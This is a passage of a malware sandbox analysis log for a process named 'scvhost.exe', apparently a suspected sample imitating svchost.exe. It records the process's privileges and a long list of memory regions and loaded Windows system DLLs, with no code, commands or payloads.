# Flog Txt Version 1 # Analyzer Version: 2.3.0 # Analyzer Build Date: Apr 12 2018 14:32:59 # Log Creation Date: 15.04.2018 00:07:12.879 Process: id = "1" image_name = "scvhost.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\scvhost.exe" page_root = "0x2317b000" os_pid = "0xb54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\scvhost.exe\" " cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5 start_va = 0xa0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6 start_va = 0x2a0000 end_va = 0x2a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 8 start_va = 0x400000 end_va = 0x580fff entry_point = 0x400000 region_type = mapped_file name = "scvhost.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\scvhost.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\scvhost.exe") Region: id = 9 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 12 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 13 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 15 start_va = 0x7fff0000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 16 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 164 start_va = 0x6d0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 165 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 166 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 167 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 168 start_va = 0x8b0000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 169 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 170 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 171 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 172 start_va = 0x2c0000 end_va = 0x37dfff entry_point = 0x2c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 173 start_va = 0x74c40000 end_va = 0x74cd0fff entry_point = 0x74c40000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 174 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 175 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 176 start_va = 0x380000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 177 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 178 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 179 start_va = 0x9b0000 end_va = 0xbaffff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 180 start_va = 0xbb0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 181 start_va = 0xdb0000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 182 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 183 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 184 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 185 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 186 start_va = 0x74b20000 end_va = 0x74b36fff entry_point = 0x74b20000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 187 start_va = 0x74b40000 end_va = 0x74b52fff entry_point = 0x74b40000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 188 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 189 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 190 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 191 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 192 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 193 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 194 start_va = 0x75070000 end_va = 0x7507efff entry_point = 0x75070000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 195 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 196 start_va = 0x750d0000 end_va = 0x755acfff entry_point = 0x750d0000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 197 start_va = 0x755b0000 end_va = 0x7696efff entry_point = 0x755b0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 198 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 199 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 200 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 201 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 202 start_va = 0x777f0000 end_va = 0x77833fff entry_point = 0x777f0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 203 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 204 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 205 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 206 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 207 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 208 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 209 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 210 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 211 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 212 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 213 start_va = 0x6e0000 end_va = 0x867fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 214 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 215 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 216 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 217 start_va = 0x5d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 218 start_va = 0xfb0000 end_va = 0x1130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fb0000" filename = "" Region: id = 219 start_va = 0x1140000 end_va = 0x253ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 220 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 221 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 222 start_va = 0x2540000 end_va = 0x2876fff entry_point = 0x2540000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 223 start_va = 0x5e0000 end_va = 0x5e3fff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 224 start_va = 0x2880000 end_va = 0x297ffff entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 13045 start_va = 0x610000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13046 start_va = 0x2980000 end_va = 0x2b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 13047 start_va = 0x7feaa000 end_va = 0x7feacfff entry_point = 0x0 region_type = private name = "private_0x000000007feaa000" filename = "" Region: id = 13048 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 13049 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 13050 start_va = 0x2b80000 end_va = 0x2d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 13051 start_va = 0x7fea7000 end_va = 0x7fea9fff entry_point = 0x0 region_type = private name = "private_0x000000007fea7000" filename = "" Region: id = 13052 start_va = 0x690000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 13053 start_va = 0x2d80000 end_va = 0x2f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 13054 start_va = 0x74a00000 end_va = 0x74a4dfff entry_point = 0x74a00000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 13055 start_va = 0x7fea4000 end_va = 0x7fea6fff entry_point = 0x0 region_type = private name = "private_0x000000007fea4000" filename = "" Region: id = 13056 start_va = 0x870000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 13057 start_va = 0x2f80000 end_va = 0x317ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 13058 start_va = 0x3180000 end_va = 0x31bffff entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 13059 start_va = 0x31c0000 end_va = 0x33bffff entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 13060 start_va = 0x33c0000 end_va = 0x33fffff entry_point = 0x0 region_type = private name = "private_0x00000000033c0000" filename = "" Region: id = 13061 start_va = 0x3400000 end_va = 0x35fffff entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 13062 start_va = 0x3600000 end_va = 0x363ffff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 13063 start_va = 0x3640000 end_va = 0x383ffff entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 13064 start_va = 0x3840000 end_va = 0x387ffff entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 13065 start_va = 0x3880000 end_va = 0x3a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 13066 start_va = 0x7fe95000 end_va = 0x7fe97fff entry_point = 0x0 region_type = private name = "private_0x000000007fe95000" filename = "" Region: id = 13067 start_va = 0x7fe98000 end_va = 0x7fe9afff entry_point = 0x0 region_type = private name = "private_0x000000007fe98000" filename = "" Region: id = 13068 start_va = 0x7fe9b000 end_va = 0x7fe9dfff entry_point = 0x0 region_type = private name = "private_0x000000007fe9b000" filename = "" Region: id = 13069 start_va = 0x7fe9e000 end_va = 0x7fea0fff entry_point = 0x0 region_type = private name = "private_0x000000007fe9e000" filename = "" Region: id = 13070 start_va = 0x7fea1000 end_va = 0x7fea3fff entry_point = 0x0 region_type = private name = "private_0x000000007fea1000" filename = "" Region: id = 13071 start_va = 0x3a80000 end_va = 0x3abffff entry_point = 0x0 region_type = private name = "private_0x0000000003a80000" filename = "" Region: id = 13072 start_va = 0x3ac0000 end_va = 0x3cbffff entry_point = 0x0 region_type = private name = "private_0x0000000003ac0000" filename = "" Region: id = 13073 start_va = 0x3cc0000 end_va = 0x3cfffff entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 13074 start_va = 0x3d00000 end_va = 0x3efffff entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 13075 start_va = 0x3f00000 end_va = 0x3f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 13076 start_va = 0x3f40000 end_va = 0x413ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f40000" filename = "" Region: id = 13077 start_va = 0x7fe8c000 end_va = 0x7fe8efff entry_point = 0x0 region_type = private name = "private_0x000000007fe8c000" filename = "" Region: id = 13078 start_va = 0x7fe8f000 end_va = 0x7fe91fff entry_point = 0x0 region_type = private name = "private_0x000000007fe8f000" filename = "" Region: id = 13079 start_va = 0x7fe92000 end_va = 0x7fe94fff entry_point = 0x0 region_type = private name = "private_0x000000007fe92000" filename = "" Region: id = 13080 start_va = 0x4140000 end_va = 0x417ffff entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 13081 start_va = 0x4180000 end_va = 0x437ffff entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 13082 start_va = 0x7fe89000 end_va = 0x7fe8bfff entry_point = 0x0 region_type = private name = "private_0x000000007fe89000" filename = "" Region: id = 13083 start_va = 0x4380000 end_va = 0x43bffff entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 13084 start_va = 0x43c0000 end_va = 0x45bffff entry_point = 0x0 region_type = private name = "private_0x00000000043c0000" filename = "" Region: id = 13085 start_va = 0x7fe86000 end_va = 0x7fe88fff entry_point = 0x0 region_type = private name = "private_0x000000007fe86000" filename = "" Region: id = 13086 start_va = 0x45c0000 end_va = 0x45fffff entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 13087 start_va = 0x4600000 end_va = 0x47fffff entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 13088 start_va = 0x7fe83000 end_va = 0x7fe85fff entry_point = 0x0 region_type = private name = "private_0x000000007fe83000" filename = "" Region: id = 13089 start_va = 0x4800000 end_va = 0x483ffff entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 13090 start_va = 0x4840000 end_va = 0x4a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004840000" filename = "" Region: id = 13091 start_va = 0x7fe80000 end_va = 0x7fe82fff entry_point = 0x0 region_type = private name = "private_0x000000007fe80000" filename = "" Region: id = 13092 start_va = 0x4a40000 end_va = 0x4a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a40000" filename = "" Region: id = 13093 start_va = 0x4a80000 end_va = 0x4c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a80000" filename = "" Region: id = 13094 start_va = 0x7fe7d000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe7d000" filename = "" Region: id = 13095 start_va = 0x4c80000 end_va = 0x4cbffff entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 13096 start_va = 0x4cc0000 end_va = 0x4ebffff entry_point = 0x0 region_type = private name = "private_0x0000000004cc0000" filename = "" Region: id = 13097 start_va = 0x7fe7a000 end_va = 0x7fe7cfff entry_point = 0x0 region_type = private name = "private_0x000000007fe7a000" filename = "" Region: id = 13098 start_va = 0x4ec0000 end_va = 0x4efffff entry_point = 0x0 region_type = private name = "private_0x0000000004ec0000" filename = "" Region: id = 13099 start_va = 0x4f00000 end_va = 0x50fffff entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 13100 start_va = 0x7fe77000 end_va = 0x7fe79fff entry_point = 0x0 region_type = private name = "private_0x000000007fe77000" filename = "" Region: id = 13101 start_va = 0x5100000 end_va = 0x513ffff entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 13102 start_va = 0x5140000 end_va = 0x533ffff entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 13103 start_va = 0x7fe74000 end_va = 0x7fe76fff entry_point = 0x0 region_type = private name = "private_0x000000007fe74000" filename = "" Region: id = 13104 start_va = 0x5340000 end_va = 0x537ffff entry_point = 0x0 region_type = private name = "private_0x0000000005340000" filename = "" Region: id = 13105 start_va = 0x5380000 end_va = 0x557ffff entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 13106 start_va = 0x7fe71000 end_va = 0x7fe73fff entry_point = 0x0 region_type = private name = "private_0x000000007fe71000" filename = "" Region: id = 13107 start_va = 0x5580000 end_va = 0x55bffff entry_point = 0x0 region_type = private name = "private_0x0000000005580000" filename = "" Region: id = 13108 start_va = 0x55c0000 end_va = 0x57bffff entry_point = 0x0 region_type = private name = "private_0x00000000055c0000" filename = "" Region: id = 13109 start_va = 0x57c0000 end_va = 0x57fffff entry_point = 0x0 region_type = private name = "private_0x00000000057c0000" filename = "" Region: id = 13110 start_va = 0x5800000 end_va = 0x59fffff entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 13111 start_va = 0x5a00000 end_va = 0x5a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 13112 start_va = 0x5a40000 end_va = 0x5c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a40000" filename = "" Region: id = 13113 start_va = 0x5c40000 end_va = 0x5c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000005c40000" filename = "" Region: id = 13114 start_va = 0x5c80000 end_va = 0x5e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000005c80000" filename = "" Region: id = 13115 start_va = 0x5e80000 end_va = 0x5ebffff entry_point = 0x0 region_type = private name = "private_0x0000000005e80000" filename = "" Region: id = 13116 start_va = 0x5ec0000 end_va = 0x60bffff entry_point = 0x0 region_type = private name = "private_0x0000000005ec0000" filename = "" Region: id = 13117 start_va = 0x7fe62000 end_va = 0x7fe64fff entry_point = 0x0 region_type = private name = "private_0x000000007fe62000" filename = "" Region: id = 13118 start_va = 0x7fe65000 end_va = 0x7fe67fff entry_point = 0x0 region_type = private name = "private_0x000000007fe65000" filename = "" Region: id = 13119 start_va = 0x7fe68000 end_va = 0x7fe6afff entry_point = 0x0 region_type = private name = "private_0x000000007fe68000" filename = "" Region: id = 13120 start_va = 0x7fe6b000 end_va = 0x7fe6dfff entry_point = 0x0 region_type = private name = "private_0x000000007fe6b000" filename = "" Region: id = 13121 start_va = 0x7fe6e000 end_va = 0x7fe70fff entry_point = 0x0 region_type = private name = "private_0x000000007fe6e000" filename = "" Region: id = 13122 start_va = 0x60c0000 end_va = 0x60fffff entry_point = 0x0 region_type = private name = "private_0x00000000060c0000" filename = "" Region: id = 13123 start_va = 0x6100000 end_va = 0x62fffff entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 13124 start_va = 0x7fe5f000 end_va = 0x7fe61fff entry_point = 0x0 region_type = private name = "private_0x000000007fe5f000" filename = "" Region: id = 13125 start_va = 0x6300000 end_va = 0x633ffff entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 13126 start_va = 0x6340000 end_va = 0x653ffff entry_point = 0x0 region_type = private name = "private_0x0000000006340000" filename = "" Region: id = 13127 start_va = 0x6540000 end_va = 0x657ffff entry_point = 0x0 region_type = private name = "private_0x0000000006540000" filename = "" Region: id = 13128 start_va = 0x6580000 end_va = 0x677ffff entry_point = 0x0 region_type = private name = "private_0x0000000006580000" filename = "" Region: id = 13129 start_va = 0x6780000 end_va = 0x67bffff entry_point = 0x0 region_type = private name = "private_0x0000000006780000" filename = "" Region: id = 13130 start_va = 0x67c0000 end_va = 0x69bffff entry_point = 0x0 region_type = private name = "private_0x00000000067c0000" filename = "" Region: id = 13131 start_va = 0x69c0000 end_va = 0x69fffff entry_point = 0x0 region_type = private name = "private_0x00000000069c0000" filename = "" Region: id = 13132 start_va = 0x6a00000 end_va = 0x6bfffff entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 13133 start_va = 0x6c00000 end_va = 0x6c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 13134 start_va = 0x6c40000 end_va = 0x6e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000006c40000" filename = "" Region: id = 13135 start_va = 0x6e40000 end_va = 0x6e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000006e40000" filename = "" Region: id = 13136 start_va = 0x6e80000 end_va = 0x707ffff entry_point = 0x0 region_type = private name = "private_0x0000000006e80000" filename = "" Region: id = 13137 start_va = 0x7080000 end_va = 0x70bffff entry_point = 0x0 region_type = private name = "private_0x0000000007080000" filename = "" Region: id = 13138 start_va = 0x70c0000 end_va = 0x72bffff entry_point = 0x0 region_type = private name = "private_0x00000000070c0000" filename = "" Region: id = 13139 start_va = 0x72c0000 end_va = 0x72fffff entry_point = 0x0 region_type = private name = "private_0x00000000072c0000" filename = "" Region: id = 13140 start_va = 0x7300000 end_va = 0x74fffff entry_point = 0x0 region_type = private name = "private_0x0000000007300000" filename = "" Region: id = 13141 start_va = 0x7500000 end_va = 0x753ffff entry_point = 0x0 region_type = private name = "private_0x0000000007500000" filename = "" Region: id = 13142 start_va = 0x7540000 end_va = 0x773ffff entry_point = 0x0 region_type = private name = "private_0x0000000007540000" filename = "" Region: id = 13143 start_va = 0x7fe44000 end_va = 0x7fe46fff entry_point = 0x0 region_type = private name = "private_0x000000007fe44000" filename = "" Region: id = 13144 start_va = 0x7fe47000 